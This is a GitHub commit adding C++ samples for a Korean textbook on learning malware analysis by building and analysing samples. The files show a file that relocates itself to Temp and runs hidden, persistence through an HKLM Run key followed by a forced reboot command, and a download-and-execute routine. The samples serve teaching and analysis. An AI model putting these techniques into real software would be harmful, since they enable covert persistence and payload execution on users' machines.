Skip to content

Commit

Permalink
소스 코드
Browse files Browse the repository at this point in the history 
리버싱 이 정도는 알아야지 - 만들고 분석하면서 배우는 악성코드 분석
  • Loading branch information
@bjpublic
bjpublic committed May 25, 2018
1 parent 18c950b commit 17bc608
Show file tree
Hide file tree
Showing 12 changed files with 940 additions and 0 deletions.
10 changes: 10 additions & 0 deletions 소스 코드/Sample 01.cpp
View file
@@ -0,0 +1,10 @@
#include <windows.h>

int main( )
{
Beep(0x200, 0x300);

MessageBoxA(NULL, "Hi, Have a nice day!", "SecurityFactory", 0);

return 1;
}
98 changes: 98 additions & 0 deletions 소스 코드/Sample 05.cpp
View file
@@ -0,0 +1,98 @@
#include <windows.h>
#include <stdio.h>

int main( ) {
HANDLE hSourceFile, hDestFile;
TCHAR lpBuffPath[MAX_PATH] = {0,},
lpTargetPath[MAX_PATH] = {0, };
char *lpBuffer = NULL;
DWORD dwFileSize = 0,
dwRead = 0,
dwWrite = 0;
bool bResult = FALSE;

//Get the Current Folder path.
GetCurrentDirectory(MAX_PATH, lpBuffPath);

//Get Source Sample 01.exe File Path.
wsprintf(lpTargetPath, "%s%s", lpBuffPath, "\\Sample 01.exe");

//Open the Source Sample 01.exe.
hSourceFile = CreateFile(lpTargetPath,
GENERIC_READ,
0, NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL);
if(hSourceFile == INVALID_HANDLE_VALUE)
{
return 0;
}

//Get Source Sample.exe File Size.
dwFileSize = GetFileSize(hSourceFile, NULL);
if(dwFileSize == 0xFFFFFFFF)
{
CloseHandle(hSourceFile);
return 0;
}

//Allocate Buffer to Memory.
lpBuffer = (char *)malloc(dwFileSize + 1);
if(lpBuffer == NULL)
{
CloseHandle(hSourceFile);
return 0;
}

//Read the Source Sample.exe File Data.
bResult = ReadFile(hSourceFile, lpBuffer, dwFileSize, &dwRead, NULL);
if(!bResult)
{
free(lpBuffer);
CloseHandle(hSourceFile);
return 0;
}
CloseHandle(hSourceFile);

//Delete the Source Sample.exe.
bResult = DeleteFile(lpTargetPath);
if(!bResult)
{
free(lpBuffer);
return 0;
}

//Get the Temp Folder path.
GetTempPath(MAX_PATH, lpBuffPath);

//Get Source Sample.exe File Path.
wsprintf(lpTargetPath, "%s%s", lpBuffPath, "Replicated Sample 01.exe");

//Create the DestSample.exe.
hDestFile = CreateFile( lpTargetPath,
GENERIC_WRITE,
0, NULL,
CREATE_NEW,
FILE_ATTRIBUTE_NORMAL,
NULL);
if(hDestFile == INVALID_HANDLE_VALUE)
{
free(lpBuffer);
return 0;
}

//Write the Source Sample.exe File Data in DestSample.exe File.
bResult = WriteFile(hDestFile, lpBuffer, dwFileSize, &dwWrite, NULL);
if(!bResult)
{
free(lpBuffer);
CloseHandle(hDestFile);
return 0;
}
CloseHandle(hDestFile);

WinExec(lpTargetPath, SW_HIDE);

return 1;
}
119 changes: 119 additions & 0 deletions 소스 코드/Sample 05_AddFindFileCode.cpp
View file
@@ -0,0 +1,119 @@
#include <windows.h>
#include <stdio.h>

int main( ) {
WIN32_FIND_DATA FileData;
HANDLE hFind, hSourceFile, hDestFile;
TCHAR lpBuffPath[MAX_PATH] = {0, },
lpFindPath[MAX_PATH] = {0, },
lpTargetPath[MAX_PATH] = {0, };
char *lpBuffer = NULL;
DWORD dwFileSize = 0,
dwRead = 0,
dwWrite = 0;
bool bResult = FALSE;

//Get the Current Folder path.
GetCurrentDirectory(MAX_PATH, lpBuffPath);

//Determines the Find Path.
wsprintf(lpFindPath, "%s\\%s", lpBuffPath, "*.*");

//Find the first file in the specified area.
hFind = FindFirstFile(lpFindPath, &FileData);
if(hFind==INVALID_HANDLE_VALUE)
{
return 0;
}

do {
if(strcmp(FileData.cFileName, "Sample 01.exe") == 0)
{
wsprintf(lpFindPath, "%s\\%s", lpBuffPath, FileData.cFileName);

//Open the Source Sample.exe.
hSourceFile = CreateFile(lpFindPath,
GENERIC_READ,
0, NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL);
if(hSourceFile == INVALID_HANDLE_VALUE)
{
CloseHandle(hFind);
return 0;
}

//Get Source Sample.exe File Size.
dwFileSize = GetFileSize(hSourceFile, NULL);
if(dwFileSize == 0xFFFFFFFF)
{
CloseHandle(hSourceFile);
CloseHandle(hFind);
return 0;
}

//Allocate Buffer to Memory.
lpBuffer = (char *)malloc(dwFileSize + 1);
if(lpBuffer == NULL)
{
CloseHandle(hSourceFile);
CloseHandle(hFind);
return 0;
}

//Read the Source Sample.exe File Data.
bResult = ReadFile(hSourceFile, lpBuffer, dwFileSize, &dwRead, NULL);
if(!bResult)
{
CloseHandle(hSourceFile);
CloseHandle(hFind);
return 0;
}
CloseHandle(hSourceFile);

//Delete the Source Sample.exe.
bResult = DeleteFile(lpFindPath);
if(!bResult)
{
CloseHandle(hFind);
return 0;
}

//Get the Temp Folder path.
GetTempPath(MAX_PATH, lpBuffPath);

//Get Source Sample.exe File Path.
wsprintf(lpTargetPath, "%s%s", lpBuffPath, "Replicated Sample 01.exe");

//Create the DestSample.exe.
hDestFile = CreateFile( lpTargetPath,
GENERIC_WRITE,
0, NULL,
CREATE_NEW,
FILE_ATTRIBUTE_NORMAL,
NULL);
if(hDestFile == INVALID_HANDLE_VALUE)
{
CloseHandle(hFind);
return 0;
}

//Write the Source Sample.exe File Data in DestSample.exe File.
bResult = WriteFile(hDestFile, lpBuffer, dwFileSize, &dwWrite, NULL);
if(!bResult)
{
CloseHandle(hDestFile);
CloseHandle(hFind);
return 0;
}
CloseHandle(hDestFile);

WinExec(lpTargetPath, SW_HIDE);
}
} while(FindNextFile(hFind, &FileData)); //Find Next File in TampPath.

CloseHandle(hFind);

return 1;
}
57 changes: 57 additions & 0 deletions 소스 코드/Sample 06.cpp
View file
@@ -0,0 +1,57 @@
#include <windows.h>
#include <stdio.h>

int main( )
{
HKEY hKey;
TCHAR lpRunPath[] = "SOFTWARE\\Microsoft\\windows\\CurrentVersion\\Run";
TCHAR lpSamplePath[] = "C:\\Sample 01.exe";
TCHAR lpValue[MAX_PATH] = {0,};
DWORD dwCount = 0,
dwValueSize = _MAX_PATH;
LONG lResult;

lResult = RegOpenKeyEx (HKEY_LOCAL_MACHINE,
lpRunPath,
0,
KEY_ALL_ACCESS,
&hKey);
if(lResult != ERROR_SUCCESS)
return 0;

for (dwCount; lResult == 0x0000 || lResult == 0x00EA; dwCount++)
{
//Retrieves the value of the registry.
lResult = RegEnumValue (hKey,
dwCount,
lpValue,
&dwValueSize,
0, NULL, NULL, NULL);

//If the Sample value exists, delete the value.
if(!strcmp(lpValue, "Run_Sample"))
RegDeleteValue(hKey, lpValue);
}

dwValueSize = (DWORD) strlen(lpSamplePath) + 1;

//Register the Sample values.
lResult = RegSetValueEx(hKey,
"Run_Sample",
0, REG_SZ,
(BYTE*)lpSamplePath,
dwValueSize);
if(lResult != ERROR_SUCCESS)
{
RegCloseKey(hKey);
return 0;
}

RegCloseKey(hKey);

MessageBox(NULL, "The registration has been completed.\nComputer Reset START!!", "RegEdit", MB_OK);

WinExec("cmd.exe /C shutdown -r -f -t 0", SW_HIDE);

return 1;
}
77 changes: 77 additions & 0 deletions 소스 코드/Sample 07.cpp
View file
@@ -0,0 +1,77 @@
#include <windows.h>
#include <wininet.h>
#include <stdio.h>

int main( ) {
HINTERNET hInternet, hUrl;
HANDLE hFile;
DWORD dwRead = 0,
dwWritten = 0,
dwSize = 0;
TCHAR lpUrlPath[MAX_PATH] = "https://live.sysinternals.com/procexp.exe",
lpBuffer[100000],
lpProcPath[256];
bool bResult = FALSE;

GetTempPath(256, lpProcPath);
strcat(lpProcPath, "\procexp.exe");

hFile = CreateFile( lpProcPath,
GENERIC_WRITE,
0, NULL,
CREATE_ALWAYS,
FILE_ATTRIBUTE_NORMAL,
NULL);

if(hFile != INVALID_HANDLE_VALUE)
{
hInternet = InternetOpen( "HTTP",
INTERNET_OPEN_TYPE_PRECONFIG,
NULL, NULL, 0);
if(!hInternet)
{
printf("CALL FAIL_InternetOpen!!\n");
return 0;
}

hUrl = InternetOpenUrl( hInternet,
lpUrlPath,
NULL, 0,
INTERNET_FLAG_RELOAD, 0);
if(!hUrl)
{
printf("CALL FAIL_InternetOpenUrl!!\n");
return 0;
}

//Repeat until the download is complete.
do {
//Make sure that the data is ready to be downloaded.
bResult = InternetQueryDataAvailable(hUrl, &dwSize, 0, 0);
if(!bResult)
{
printf("CALL FAIL_InternetQueryDataAvailable!!\n");
return 0;
}

//Read Data From URL.
bResult = InternetReadFile (hUrl, lpBuffer, dwSize, &dwRead);
if(!bResult)
{
printf("CALL FAIL_InternetReadFile!!\n");
return 0;
}

//Write File Data.
WriteFile (hFile, lpBuffer, dwRead, &dwWritten, NULL);
} while (dwRead != 0);

InternetCloseHandle (hInternet);
InternetCloseHandle (hUrl);
}
CloseHandle (hFile);

ShellExecute(NULL, "open", lpProcPath, NULL, NULL, SW_SHOW);

return 1;
}

0 comments on commit 17bc608

Please sign in to comment.